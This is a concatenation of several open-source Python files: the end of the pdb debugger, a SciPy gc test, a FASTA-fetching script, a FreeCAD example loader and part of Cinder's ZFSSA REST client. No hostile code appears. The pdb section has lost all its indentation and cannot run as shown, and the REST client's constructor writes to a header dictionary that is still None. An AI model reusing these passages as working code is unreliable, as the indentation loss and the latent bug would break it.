if co.co_flags & 4: n = n+1
if co.co_flags & 8: n = n+1
for i in range(n):
name = co.co_varnames[i]
print >>self.stdout, name, '=',
if name in dict: print >>self.stdout, dict[name]
else: print >>self.stdout, "*** undefined ***"
do_a = do_args
def do_retval(self, arg):
if '__return__' in self.curframe.f_locals:
print >>self.stdout, self.curframe.f_locals['__return__']
else:
print >>self.stdout, '*** Not yet returned!'
do_rv = do_retval
def _getval(self, arg):
try:
return eval(arg, self.curframe.f_globals,
self.curframe.f_locals)
except:
t, v = sys.exc_info()[:2]
if isinstance(t, str):
exc_type_name = t
else: exc_type_name = t.__name__
print >>self.stdout, '***', exc_type_name + ':', repr(v)
raise
def do_p(self, arg):
try:
print >>self.stdout, repr(self._getval(arg))
except:
pass
def do_pp(self, arg):
try:
pprint.pprint(self._getval(arg), self.stdout)
except:
pass
def do_list(self, arg):
self.lastcmd = 'list'
last = None
if arg:
try:
x = eval(arg, {}, {})
if type(x) == type(()):
first, last = x
first = int(first)
last = int(last)
if last < first:
# Assume it's a count
last = first + last
else:
first = max(1, int(x) - 5)
except:
print >>self.stdout, '*** Error in argument:', repr(arg)
return
elif self.lineno is None:
first = max(1, self.curframe.f_lineno - 5)
else:
first = self.lineno + 1
if last is None:
last = first + 10
filename = self.curframe.f_code.co_filename
breaklist = self.get_file_breaks(filename)
try:
for lineno in range(first, last+1):
line = linecache.getline(filename, lineno, self.curframe.f_globals)
if not line:
print >>self.stdout, '[EOF]'
break
else:
s = repr(lineno).rjust(3)
if len(s) < 4: s = s + ' '
if lineno in breaklist: s = s + 'B'
else: s = s + ' '
if lineno == self.curframe.f_lineno:
s = s + '->'
print >>self.stdout, s + '\t' + line,
self.lineno = lineno
except KeyboardInterrupt:
pass
do_l = do_list
def do_whatis(self, arg):
try:
value = eval(arg, self.curframe.f_globals,
self.curframe.f_locals)
except:
t, v = sys.exc_info()[:2]
if type(t) == type(''):
exc_type_name = t
else: exc_type_name = t.__name__
print >>self.stdout, '***', exc_type_name + ':', repr(v)
return
code = None
# Is it a function?
try: code = value.func_code
except: pass
if code:
print >>self.stdout, 'Function', code.co_name
return
# Is it an instance method?
try: code = value.im_func.func_code
except: pass
if code:
print >>self.stdout, 'Method', code.co_name
return
# None of the above...
print >>self.stdout, type(value)
def do_alias(self, arg):
args = arg.split()
if len(args) == 0:
keys = self.aliases.keys()
keys.sort()
for alias in keys:
print >>self.stdout, "%s = %s" % (alias, self.aliases[alias])
return
if args[0] in self.aliases and len(args) == 1:
print >>self.stdout, "%s = %s" % (args[0], self.aliases[args[0]])
else:
self.aliases[args[0]] = ' '.join(args[1:])
def do_unalias(self, arg):
args = arg.split()
if len(args) == 0: return
if args[0] in self.aliases:
del self.aliases[args[0]]
#list of all the commands making the program resume execution.
commands_resuming = ['do_continue', 'do_step', 'do_next', 'do_return',
'do_quit', 'do_jump']
# Print a traceback starting at the top stack frame.
# The most recently entered frame is printed last;
# this is different from dbx and gdb, but consistent with
# the Python interpreter's stack trace.
# It is also consistent with the up/down commands (which are
# compatible with dbx and gdb: up moves towards 'main()'
# and down moves towards the most recent stack frame).
def print_stack_trace(self):
try:
for frame_lineno in self.stack:
self.print_stack_entry(frame_lineno)
except KeyboardInterrupt:
pass
def print_stack_entry(self, frame_lineno, prompt_prefix=line_prefix):
frame, lineno = frame_lineno
if frame is self.curframe:
print >>self.stdout, '>',
else:
print >>self.stdout, ' ',
print >>self.stdout, self.format_stack_entry(frame_lineno,
prompt_prefix)
# Help methods (derived from pdb.doc)
def help_help(self):
self.help_h()
def help_h(self):
print >>self.stdout, """h(elp)
Without argument, print the list of available commands.
With a command name as argument, print help about that command
"help pdb" pipes the full documentation file to the $PAGER
"help exec" gives help on the ! command"""
def help_where(self):
self.help_w()
def help_w(self):
print >>self.stdout, """w(here)
Print a stack trace, with the most recent frame at the bottom.
An arrow indicates the "current frame", which determines the
context of most commands. 'bt' is an alias for this command."""
help_bt = help_w
def help_down(self):
self.help_d()
def help_d(self):
print >>self.stdout, """d(own)
Move the current frame one level down in the stack trace
(to a newer frame)."""
def help_up(self):
self.help_u()
def help_u(self):
print >>self.stdout, """u(p)
Move the current frame one level up in the stack trace
(to an older frame)."""
def help_break(self):
self.help_b()
def help_b(self):
print >>self.stdout, """b(reak) ([file:]lineno | function) [, condition]
With a line number argument, set a break there in the current
file. With a function name, set a break at first executable line
of that function. Without argument, list all breaks. If a second
argument is present, it is a string specifying an expression
which must evaluate to true before the breakpoint is honored.
The line number may be prefixed with a filename and a colon,
to specify a breakpoint in another file (probably one that
hasn't been loaded yet). The file is searched for on sys.path;
the .py suffix may be omitted."""
def help_clear(self):
self.help_cl()
def help_cl(self):
print >>self.stdout, "cl(ear) filename:lineno"
print >>self.stdout, """cl(ear) [bpnumber [bpnumber...]]
With a space separated list of breakpoint numbers, clear
those breakpoints. Without argument, clear all breaks (but
first ask confirmation). With a filename:lineno argument,
clear all breaks at that line in that file.
Note that the argument is different from previous versions of
the debugger (in python distributions 1.5.1 and before) where
a linenumber was used instead of either filename:lineno or
breakpoint numbers."""
def help_tbreak(self):
print >>self.stdout, """tbreak same arguments as break, but breakpoint is
removed when first hit."""
def help_enable(self):
print >>self.stdout, """enable bpnumber [bpnumber ...]
Enables the breakpoints given as a space separated list of
bp numbers."""
def help_disable(self):
print >>self.stdout, """disable bpnumber [bpnumber ...]
Disables the breakpoints given as a space separated list of
bp numbers."""
def help_ignore(self):
print >>self.stdout, """ignore bpnumber count
Sets the ignore count for the given breakpoint number. A breakpoint
becomes active when the ignore count is zero. When non-zero, the
count is decremented each time the breakpoint is reached and the
breakpoint is not disabled and any associated condition evaluates
to true."""
def help_condition(self):
print >>self.stdout, """condition bpnumber str_condition
str_condition is a string specifying an expression which
must evaluate to true before the breakpoint is honored.
If str_condition is absent, any existing condition is removed;
i.e., the breakpoint is made unconditional."""
def help_step(self):
self.help_s()
def help_s(self):
print >>self.stdout, """s(tep)
Execute the current line, stop at the first possible occasion
(either in a function that is called or in the current function)."""
def help_until(self):
self.help_unt()
def help_unt(self):
print """unt(il)
Continue execution until the line with a number greater than the current
one is reached or until the current frame returns"""
def help_next(self):
self.help_n()
def help_n(self):
print >>self.stdout, """n(ext)
Continue execution until the next line in the current function
is reached or it returns."""
def help_return(self):
self.help_r()
def help_r(self):
print >>self.stdout, """r(eturn)
Continue execution until the current function returns."""
def help_continue(self):
self.help_c()
def help_cont(self):
self.help_c()
def help_c(self):
print >>self.stdout, """c(ont(inue))
Continue execution, only stop when a breakpoint is encountered."""
def help_jump(self):
self.help_j()
def help_j(self):
print >>self.stdout, """j(ump) lineno
Set the next line that will be executed."""
def help_debug(self):
print >>self.stdout, """debug code
Enter a recursive debugger that steps through the code argument
(which is an arbitrary expression or statement to be executed
in the current environment)."""
def help_list(self):
self.help_l()
def help_l(self):
print >>self.stdout, """l(ist) [first [,last]]
List source code for the current file.
Without arguments, list 11 lines around the current line
or continue the previous listing.
With one argument, list 11 lines starting at that line.
With two arguments, list the given range;
if the second argument is less than the first, it is a count."""
def help_args(self):
self.help_a()
def help_a(self):
print >>self.stdout, """a(rgs)
Print the arguments of the current function."""
def help_p(self):
print >>self.stdout, """p expression
Print the value of the expression."""
def help_pp(self):
print >>self.stdout, """pp expression
Pretty-print the value of the expression."""
def help_exec(self):
print >>self.stdout, """(!) statement
Execute the (one-line) statement in the context of
the current stack frame.
The exclamation point can be omitted unless the first word
of the statement resembles a debugger command.
To assign to a global variable you must always prefix the
command with a 'global' command, e.g.:
(Pdb) global list_options; list_options = ['-l']
(Pdb)"""
def help_run(self):
print """run [args...]
Restart the debugged python program. If a string is supplied, it is
splitted with "shlex" and the result is used as the new sys.argv.
History, breakpoints, actions and debugger options are preserved.
"restart" is an alias for "run"."""
help_restart = help_run
def help_quit(self):
self.help_q()
def help_q(self):
print >>self.stdout, """q(uit) or exit - Quit from the debugger.
The program being executed is aborted."""
help_exit = help_q
def help_whatis(self):
print >>self.stdout, """whatis arg
Prints the type of the argument."""
def help_EOF(self):
print >>self.stdout, """EOF
Handles the receipt of EOF as a command."""
def help_alias(self):
print >>self.stdout, """alias [name [command [parameter parameter ...] ]]
Creates an alias called 'name' the executes 'command'. The command
must *not* be enclosed in quotes. Replaceable parameters are
indicated by %1, %2, and so on, while %* is replaced by all the
parameters. If no command is given, the current alias for name
is shown. If no name is given, all aliases are listed.
Aliases may be nested and can contain anything that can be
legally typed at the pdb prompt. Note! You *can* override
internal pdb commands with aliases! Those internal commands
are then hidden until the alias is removed. Aliasing is recursively
applied to the first word of the command line; all other words
in the line are left alone.
Some useful aliases (especially when placed in the .pdbrc file) are:
#Print instance variables (usage "pi classInst")
alias pi for k in %1.__dict__.keys(): print "%1.",k,"=",%1.__dict__[k]
#Print instance variables in self
alias ps pi self
"""
def help_unalias(self):
print >>self.stdout, """unalias name
Deletes the specified alias."""
def help_commands(self):
print >>self.stdout, """commands [bpnumber]
(com) ...
(com) end
(Pdb)
Specify a list of commands for breakpoint number bpnumber. The
commands themselves appear on the following lines. Type a line
containing just 'end' to terminate the commands.
To remove all commands from a breakpoint, type commands and
follow it immediately with end; that is, give no commands.
With no bpnumber argument, commands refers to the last
breakpoint set.
You can use breakpoint commands to start your program up again.
Simply use the continue command, or step, or any other
command that resumes execution.
Specifying any command resuming execution (currently continue,
step, next, return, jump, quit and their abbreviations) terminates
the command list (as if that command was immediately followed by end).
This is because any time you resume execution
(even with a simple next or step), you may encounter
another breakpoint--which could have its own command list, leading to
ambiguities about which list to execute.
If you use the 'silent' command in the command list, the
usual message about stopping at a breakpoint is not printed. This may
be desirable for breakpoints that are to print a specific message and
then continue. If none of the other commands print anything, you
see no sign that the breakpoint was reached.
"""
def help_pdb(self):
help()
    def lookupmodule(self, filename):
        """Helper function for break/clear parsing -- may be overridden.

        lookupmodule() translates (possibly incomplete) file or module name
        into an absolute file name.  Returns None if nothing resolves.
        """
        if os.path.isabs(filename) and os.path.exists(filename):
            return filename
        # Relative to the directory of the script being debugged.
        f = os.path.join(sys.path[0], filename)
        if os.path.exists(f) and self.canonic(f) == self.mainpyfile:
            return f
        # Treat a bare module name as '<name>.py'.
        root, ext = os.path.splitext(filename)
        if ext == '':
            filename = filename + '.py'
        if os.path.isabs(filename):
            return filename
        for dirname in sys.path:
            # Resolve symlinked sys.path entries to their real directory.
            while os.path.islink(dirname):
                dirname = os.readlink(dirname)
            fullname = os.path.join(dirname, filename)
            if os.path.exists(fullname):
                return fullname
        return None
    def _runscript(self, filename):
        # The script has to run in __main__ namespace (or imports from
        # __main__ will break).
        #
        # So we clear up the __main__ and set several special variables
        # (this gets rid of pdb's globals and cleans old variables on restarts).
        import __main__
        __main__.__dict__.clear()
        __main__.__dict__.update({"__name__"    : "__main__",
                                  "__file__"    : filename,
                                  "__builtins__": __builtins__,
                                 })
        # When bdb sets tracing, a number of call and line events happens
        # BEFORE debugger even reaches user's code (and the exact sequence of
        # events depends on python version). So we take special measures to
        # avoid stopping before we reach the main script (see user_line and
        # user_call for details).
        self._wait_for_mainpyfile = 1
        self.mainpyfile = self.canonic(filename)
        self._user_requested_quit = 0
        # NOTE(review): filenames containing a '"' break this statement
        # string -- presumably never the case for real script paths, but
        # worth confirming before reuse.
        statement = 'execfile( "%s")' % filename
        self.run(statement)
# Simplified interface
def run(statement, globals=None, locals=None):
    # Debug a statement executed in the given namespaces; see Pdb.run().
    Pdb().run(statement, globals, locals)
def runeval(expression, globals=None, locals=None):
    # Debug an expression and return its value; see Pdb.runeval().
    return Pdb().runeval(expression, globals, locals)
def runctx(statement, globals, locals):
    # B/W compatibility
    run(statement, globals, locals)
def runcall(*args, **kwds):
    # Debug a single function call: runcall(func, *args, **kwds).
    return Pdb().runcall(*args, **kwds)
def set_trace():
    # Hard-coded breakpoint: start debugging at the caller's frame.
    Pdb().set_trace(sys._getframe().f_back)
# Post-Mortem interface
def post_mortem(t=None):
    # handling the default
    if t is None:
        # sys.exc_info() returns (type, value, traceback) if an exception is
        # being handled, otherwise it returns None
        t = sys.exc_info()[2]
        if t is None:
            raise ValueError("A valid traceback must be passed if no "
                             "exception is being handled")
    p = Pdb()
    p.reset()
    p.interaction(None, t)
def pm():
    # Post-mortem debug the last uncaught exception's traceback.
    post_mortem(sys.last_traceback)
# Main program for testing
TESTCMD = 'import x; x.main()'
def test():
    # Debug the canned TESTCMD statement.
    run(TESTCMD)
# print help
def help():
    # Page the pdb.doc file from the first sys.path entry that contains
    # it, honouring the user's $PAGER (defaulting to "more").
    for dirname in sys.path:
        fullname = os.path.join(dirname, 'pdb.doc')
        if os.path.exists(fullname):
            sts = os.system('${PAGER-more} '+fullname)
            if sts: print '*** Pager exit status:', sts
            break
    else:
        print 'Sorry, can\'t find the help file "pdb.doc"',
        print 'along the Python search path'
def main():
    # Command-line entry point for "pdb.py scriptfile [arg] ...": run the
    # script under the debugger and restart it after exits and crashes.
    if not sys.argv[1:] or sys.argv[1] in ("--help", "-h"):
        print "usage: pdb.py scriptfile [arg] ..."
        sys.exit(2)
    mainpyfile = sys.argv[1] # Get script filename
    if not os.path.exists(mainpyfile):
        print 'Error:', mainpyfile, 'does not exist'
        sys.exit(1)
    del sys.argv[0] # Hide "pdb.py" from argument list
    # Replace pdb's dir with script's dir in front of module search path.
    sys.path[0] = os.path.dirname(mainpyfile)
    # Note on saving/restoring sys.argv: it's a good idea when sys.argv was
    # modified by the script being debugged. It's a bad idea when it was
    # changed by the user from the command line. There is a "restart" command which
    # allows explicit specification of command line arguments.
    pdb = Pdb()
    while 1:
        try:
            pdb._runscript(mainpyfile)
            if pdb._user_requested_quit:
                break
            print "The program finished and will be restarted"
        except Restart:
            print "Restarting", mainpyfile, "with arguments:"
            print "\t" + " ".join(sys.argv[1:])
        except SystemExit:
            # In most cases SystemExit does not warrant a post-mortem session.
            print "The program exited via sys.exit(). Exit status: ",
            print sys.exc_info()[1]
        except:
            # Any other uncaught exception: report it and drop into a
            # post-mortem session on its traceback.
            traceback.print_exc()
            print "Uncaught exception. Entering post mortem debugging"
            print "Running 'cont' or 'step' will restart the program"
            t = sys.exc_info()[2]
            pdb.interaction(None, t)
            print "Post mortem debugger finished. The "+mainpyfile+" will be restarted"
# When invoked as main program, invoke the debugger on a script
if __name__ == '__main__':
    import pdb
    pdb.main()
| lgpl-2.1 |
anntzer/scipy | scipy/_lib/tests/test__gcutils.py | 12 | 3416 | """ Test for assert_deallocated context manager and gc utilities
"""
import gc
from scipy._lib._gcutils import (set_gc_state, gc_state, assert_deallocated,
ReferenceError, IS_PYPY)
from numpy.testing import assert_equal
import pytest
def test_set_gc_state():
    # set_gc_state() must enable/disable collection regardless of the
    # starting state; the interpreter's original state is restored after.
    gc_status = gc.isenabled()
    try:
        for state in (True, False):
            gc.enable()
            set_gc_state(state)
            assert_equal(gc.isenabled(), state)
            gc.disable()
            set_gc_state(state)
            assert_equal(gc.isenabled(), state)
    finally:
        if gc_status:
            gc.enable()
def test_gc_state():
    # Test gc_state context manager
    gc_status = gc.isenabled()
    try:
        for pre_state in (True, False):
            set_gc_state(pre_state)
            for with_state in (True, False):
                # Check the gc state is with_state in with block
                with gc_state(with_state):
                    assert_equal(gc.isenabled(), with_state)
                # And returns to previous state outside block
                assert_equal(gc.isenabled(), pre_state)
                # Even if the gc state is set explicitly within the block
                with gc_state(with_state):
                    assert_equal(gc.isenabled(), with_state)
                    set_gc_state(not with_state)
                assert_equal(gc.isenabled(), pre_state)
    finally:
        if gc_status:
            gc.enable()
@pytest.mark.skipif(IS_PYPY, reason="Test not meaningful on PyPy")
def test_assert_deallocated():
    # Ordinary use
    class C:
        def __init__(self, arg0, arg1, name='myname'):
            self.name = name
    for gc_current in (True, False):
        with gc_state(gc_current):
            # We are deleting from with-block context, so that's OK
            with assert_deallocated(C, 0, 2, 'another name') as c:
                assert_equal(c.name, 'another name')
                del c
            # Or not using the thing in with-block context, also OK
            with assert_deallocated(C, 0, 2, name='third name'):
                pass
            assert_equal(gc.isenabled(), gc_current)
@pytest.mark.skipif(IS_PYPY, reason="Test not meaningful on PyPy")
def test_assert_deallocated_nodel():
    # Keeping the instance referenced past the with block must raise.
    class C:
        pass
    with pytest.raises(ReferenceError):
        # Need to delete after using if in with-block context
        # Note: assert_deallocated(C) needs to be assigned for the test
        # to function correctly. It is assigned to c, but c itself is
        # not referenced in the body of the with, it is only there for
        # the refcount.
        with assert_deallocated(C) as c:
            pass
@pytest.mark.skipif(IS_PYPY, reason="Test not meaningful on PyPy")
def test_assert_deallocated_circular():
    # A self-referencing instance cannot be freed by refcounting alone.
    class C:
        def __init__(self):
            self._circular = self
    with pytest.raises(ReferenceError):
        # Circular reference, no automatic garbage collection
        with assert_deallocated(C) as c:
            del c
@pytest.mark.skipif(IS_PYPY, reason="Test not meaningful on PyPy")
def test_assert_deallocated_circular2():
    # Same as above, without even naming the instance.
    class C:
        def __init__(self):
            self._circular = self
    with pytest.raises(ReferenceError):
        # Still circular reference, no automatic garbage collection
        with assert_deallocated(C):
            pass
| bsd-3-clause |
ChrisCummins/pip-db | tools/fetch-fasta.py | 1 | 4208 | #!/usr/bin/env python
#
# Copyright 2014 Chris Cummins.
#
# This file is part of pip-db.
#
# pip-db is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# pip-db is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with pip-db. If not, see <http://www.gnu.org/licenses/>.
#
import json
import re
import sys
import threading
import urllib
# URL regular expression
url_re = re.compile('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', re.IGNORECASE)
# UniProt sequence page expression
uniprot_sequence_re = re.compile('http://(www|ebi[0-9]).uniprot.org/uniprot/[A-Z0-9]{6}', re.IGNORECASE)
ncbi_url_re = re.compile('http://www.ncbi.nlm.nih.gov/protein/[^?]+')
# NCBI uidlist meta tag expression
ncbi_meta_re = re.compile('<meta name="ncbi_uidlist" content="([0-9]+)" />', re.IGNORECASE)
def warning(msg):
    # Emit a non-fatal diagnostic on stderr.
    sys.stderr.write("warning: " + str(msg) + '\n')
def print_result(url, name, data):
    # Emit one fetched sequence as a single-line JSON record on stdout.
    print json.dumps({"url": url, "name": name, "data": data})
def line_to_urls(line):
    # Return every URL-looking substring found in the given line.
    return url_re.findall(line)
def get_url_set(input_stream):
    """Return the set of unique URLs found in *input_stream*.

    Every line of the stream is scanned with url_re (via line_to_urls)
    and all matches are collected into a set.
    """
    url_list = []
    # Bug fix: iterate over the stream that was passed in, not sys.stdin.
    # The parameter was previously ignored, which broke any caller that
    # supplied a stream other than stdin.
    for line in input_stream:
        url_list.extend(line_to_urls(line))
    return set(url_list)
def get_uniprot_sequence_url_set(url_set):
    # Subset of url_set that are UniProt sequence pages.
    return set(filter(uniprot_sequence_re.match, url_set))
def get_ncbi_url_set(url_set):
    # Subset of url_set that are NCBI protein pages.
    return set(filter(ncbi_url_re.match, url_set))
def fetch(url):
    # Open the URL and return the file-like response. On failure an error
    # is printed and None is (implicitly) returned, so callers must cope
    # with a None result.
    try:
        return urllib.urlopen(url)
    except IOError as e:
        print "error: IO({0}): {1}".format(e.errno, e.strerror)
    except Exception as e:
        print "error:", e
class Spider(threading.Thread):
    # Worker thread that downloads one FASTA record and prints it as JSON.
    # A class-wide lock serialises output so records do not interleave.
    output_lock = threading.Lock()
    def __init__(self, url, fetch):
        # `fetch` is a callable(url) -> raw FASTA text for that provider.
        threading.Thread.__init__(self)
        self.url = url
        self.fetch = fetch
    def str2fasta(self, string):
        # Split raw FASTA text into its header line ("name") and the
        # concatenated sequence body ("data").
        lines = string.split("\n")
        name = lines[0]
        data = "\n".join(lines[1:]).replace("\n", "")
        if not name.startswith(">"):
            warning("sequence '" + self.url + "' name does not begin with '>'")
        return {"name": name, "data": data}
    def run(self):
        # Fetch, parse and print the record under the shared output lock.
        fasta = self.str2fasta(self.fetch(self.url).strip())
        if len(fasta):
            with self.output_lock:
                print_result(self.url, fasta["name"], fasta["data"])
def fetch_fasta_uniprot(url):
    # UniProt serves the FASTA directly at "<entry URL>.fasta".
    return fetch(url + '.fasta').read()
def fetch_fasta_ncbi(url):
    # NCBI needs two round trips: scrape the numeric UID out of the entry
    # page's meta tag, then request the FASTA rendering of that UID.
    def fetch_ncbi_uid(url):
        for line in fetch(url):
            m = ncbi_meta_re.search(line)
            if m:
                return m.group(1)
    def ncbi_uid_to_fasta_url(uid):
        return "http://www.ncbi.nlm.nih.gov/sviewer/viewer.cgi?tool=portal&sendto=on&log$=seqview&db=protein&dopt=fasta&sort=&val={0}&from=begin&to=end".format(uid)
    uid = fetch_ncbi_uid(url)
    if uid:
        return fetch(ncbi_uid_to_fasta_url(uid)).read()
    else:
        warning("unable to retrieve NCBI UID for '" + url + "'. Ignoring.")
def run():
    """Read URLs from stdin, fetch a FASTA record for each recognised
    provider (UniProt, NCBI) in parallel, and print one JSON result per
    sequence. Unrecognised URLs are reported on stderr and skipped.
    """
    # Get the full list of URLs
    urls = get_url_set(sys.stdin)
    # Get the UniProt URLs
    uniprot_urls = get_uniprot_sequence_url_set(urls)
    urls = urls - uniprot_urls
    # Get the NCBI URLs
    ncbi_urls = get_ncbi_url_set(urls)
    urls = urls - ncbi_urls
    # Warn the user about ignored URLs
    for url in urls:
        warning("cannot process URL '" + url + "'. Ignoring.")
    # Spawn one worker thread per URL, using the fetcher matching the
    # URL's provider.
    threads = []
    for url in uniprot_urls:
        spider = Spider(url, fetch_fasta_uniprot)
        spider.start()
        threads.append(spider)
    for url in ncbi_urls:
        spider = Spider(url, fetch_fasta_ncbi)
        spider.start()
        threads.append(spider)
    # Bug fix: wait for all workers so run() does not return while
    # results are still being fetched and printed.
    for thread in threads:
        thread.join()
# Script entry point: report any uncaught error instead of a traceback.
if __name__ == "__main__":
    try:
        run()
    except Exception as e:
        print "error:", e
| gpl-3.0 |
bblacey/FreeCAD-MacOS-CI | src/Mod/Start/StartPage/LoadFemExample3D.py | 13 | 1857 | #***************************************************************************
#* *
#* Copyright (c) 2012 *
#* Yorik van Havre <yorik@uncreated.net> *
#* *
#* This program is free software; you can redistribute it and/or modify *
#* it under the terms of the GNU Lesser General Public License (LGPL) *
#* as published by the Free Software Foundation; either version 2 of *
#* the License, or (at your option) any later version. *
#* for detail see the LICENCE text file. *
#* *
#* This program is distributed in the hope that it will be useful, *
#* but WITHOUT ANY WARRANTY; without even the implied warranty of *
#* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
#* GNU Library General Public License for more details. *
#* *
#* You should have received a copy of the GNU Library General Public *
#* License along with this program; if not, write to the Free Software *
#* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
#* USA *
#* *
#***************************************************************************
# Open the bundled CalculiX 3D cantilever FEM example document and ask the
# active 3D view(s) to fit the whole model into view.
import FreeCAD,FreeCADGui
FreeCAD.open(FreeCAD.getResourceDir()+"examples/FemCalculixCantilever3D.FCStd")
FreeCADGui.activeDocument().sendMsgToViews("ViewFit")
| lgpl-2.1 |
tmenjo/cinder-2015.1.0 | cinder/volume/drivers/zfssa/restclient.py | 4 | 11873 | # Copyright (c) 2014, Oracle and/or its affiliates. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
ZFS Storage Appliance REST API Client Programmatic Interface
"""
import httplib
import json
import StringIO
import time
import urllib2
from oslo_log import log
from cinder.i18n import _LE, _LI
LOG = log.getLogger(__name__)
class Status(object):
    """Result HTTP Status

    Symbolic names for the HTTP status codes this client distinguishes;
    the values mirror the httplib constants.
    """
    def __init__(self):
        pass
    #: Request return OK
    OK = httplib.OK
    #: New resource created successfully
    CREATED = httplib.CREATED
    #: Command accepted
    ACCEPTED = httplib.ACCEPTED
    #: Command returned OK but no data will be returned
    NO_CONTENT = httplib.NO_CONTENT
    #: Bad Request
    BAD_REQUEST = httplib.BAD_REQUEST
    #: User is not authorized
    UNAUTHORIZED = httplib.UNAUTHORIZED
    #: The request is not allowed
    FORBIDDEN = httplib.FORBIDDEN
    #: The requested resource was not found
    NOT_FOUND = httplib.NOT_FOUND
    #: The request is not allowed
    NOT_ALLOWED = httplib.METHOD_NOT_ALLOWED
    #: Request timed out
    TIMEOUT = httplib.REQUEST_TIMEOUT
    #: Invalid request
    CONFLICT = httplib.CONFLICT
    #: Service Unavailable
    BUSY = httplib.SERVICE_UNAVAILABLE
class RestResult(object):
    """Result from a REST API operation"""
    def __init__(self, response=None, err=None):
        """Initialize a RestResult containing the results from a REST call
        :param response: HTTP response
        :param err: HTTPError raised by the call, if any; its code and
                    canonical reason phrase are used instead of a body.
        """
        self.response = response
        self.error = err
        self.data = ""
        self.status = 0
        if self.response:
            self.status = self.response.getcode()
            result = self.response.read()
            # Drain the response in a loop; read() may return partial data.
            while result:
                self.data += result
                result = self.response.read()
        if self.error:
            self.status = self.error.code
            self.data = httplib.responses[self.status]
        LOG.debug('Response code: %s' % self.status)
        LOG.debug('Response data: %s' % self.data)
    def get_header(self, name):
        """Get an HTTP header with the given name from the results
        :param name: HTTP header name
        :return: The header value or None if no value is found
        """
        if self.response is None:
            return None
        info = self.response.info()
        return info.getheader(name)
class RestClientError(Exception):
    """Exception for ZFS REST API client errors"""
    def __init__(self, status, name="ERR_INTERNAL", message=None):
        """Create a REST Response exception

        :param status: HTTP response status
        :param name: The name of the REST API error type
        :param message: Descriptive error message returned from REST call
        """
        super(RestClientError, self).__init__(message)
        self.code = status
        self.name = name
        self.msg = message
        # Bug fix: only fall back to the canonical HTTP reason phrase when
        # no explicit message was supplied. Previously a caller-provided
        # message was unconditionally overwritten for any well-known status.
        if self.msg is None and status in httplib.responses:
            self.msg = httplib.responses[status]
    def __str__(self):
        # "<code> <name> <message>", e.g. "404 ERR_INTERNAL Not Found".
        return "%d %s %s" % (self.code, self.name, self.msg)
class RestClientURL(object):
"""ZFSSA urllib2 client"""
def __init__(self, url, **kwargs):
"""Initialize a REST client.
:param url: The ZFSSA REST API URL
:key session: HTTP Cookie value of x-auth-session obtained from a
normal BUI login.
:key timeout: Time in seconds to wait for command to complete.
(Default is 60 seconds)
"""
self.url = url
self.local = kwargs.get("local", False)
self.base_path = kwargs.get("base_path", "/api")
self.timeout = kwargs.get("timeout", 60)
self.headers = None
if kwargs.get('session'):
self.headers['x-auth-session'] = kwargs.get('session')
self.headers = {"content-type": "application/json"}
self.do_logout = False
self.auth_str = None
def _path(self, path, base_path=None):
"""build rest url path"""
if path.startswith("http://") or path.startswith("https://"):
return path
if base_path is None:
base_path = self.base_path
if not path.startswith(base_path) and not (
self.local and ("/api" + path).startswith(base_path)):
path = "%s%s" % (base_path, path)
if self.local and path.startswith("/api"):
path = path[4:]
return self.url + path
    def _authorize(self):
        """Performs authorization setting x-auth-session"""
        # Send the stored basic-auth credentials once; on success the
        # appliance returns an x-auth-session cookie that replaces the
        # authorization header for subsequent requests.
        self.headers['authorization'] = 'Basic %s' % self.auth_str
        if 'x-auth-session' in self.headers:
            del self.headers['x-auth-session']
        try:
            result = self.post("/access/v1")
            del self.headers['authorization']
            if result.status == httplib.CREATED:
                self.headers['x-auth-session'] = \
                    result.get_header('x-auth-session')
                self.do_logout = True
                LOG.info(_LI('ZFSSA version: %s') %
                         result.get_header('x-zfssa-version'))
            elif result.status == httplib.NOT_FOUND:
                raise RestClientError(result.status, name="ERR_RESTError",
                                      message="REST Not Available: \
                                      Please Upgrade")
        except RestClientError as err:
            # Never leave credentials in the default header set on failure.
            del self.headers['authorization']
            raise err
    def login(self, auth_str):
        """Login to an appliance using a user name and password.
        Start a session like what is done logging into the BUI. This is not a
        requirement to run REST commands, since the protocol is stateless.
        What is does is set up a cookie session so that some server side
        caching can be done. If login is used remember to call logout when
        finished.
        :param auth_str: Authorization string (base64)
        """
        self.auth_str = auth_str
        self._authorize()
    def logout(self):
        """Logout of an appliance"""
        result = None
        try:
            result = self.delete("/access/v1", base_path="/api")
        except RestClientError:
            # Best effort: dropping the session may fail harmlessly.
            pass
        self.headers.clear()
        self.do_logout = False
        return result
    def islogin(self):
        """return if client is login"""
        return self.do_logout
@staticmethod
def mkpath(*args, **kwargs):
"""Make a path?query string for making a REST request
:cmd_params args: The path part
:cmd_params kwargs: The query part
"""
buf = StringIO.StringIO()
query = "?"
for arg in args:
buf.write("/")
buf.write(arg)
for k in kwargs:
buf.write(query)
if query == "?":
query = "&"
buf.write(k)
buf.write("=")
buf.write(kwargs[k])
return buf.getvalue()
    def request(self, path, request, body=None, **kwargs):
        """Make an HTTP request and return the results
        :param path: Path used with the initialized URL to make a request
        :param request: HTTP request type (GET, POST, PUT, DELETE)
        :param body: HTTP body of request
        :key accept: Set HTTP 'Accept' header with this value
        :key base_path: Override the base_path for this request
        :key content: Set HTTP 'Content-Type' header with this value
        """
        out_hdrs = dict.copy(self.headers)
        if kwargs.get("accept"):
            out_hdrs['accept'] = kwargs.get("accept")
        if body:
            if isinstance(body, dict):
                body = str(json.dumps(body))
        if body and len(body):
            out_hdrs['content-length'] = len(body)
        zfssaurl = self._path(path, kwargs.get("base_path"))
        req = urllib2.Request(zfssaurl, body, out_hdrs)
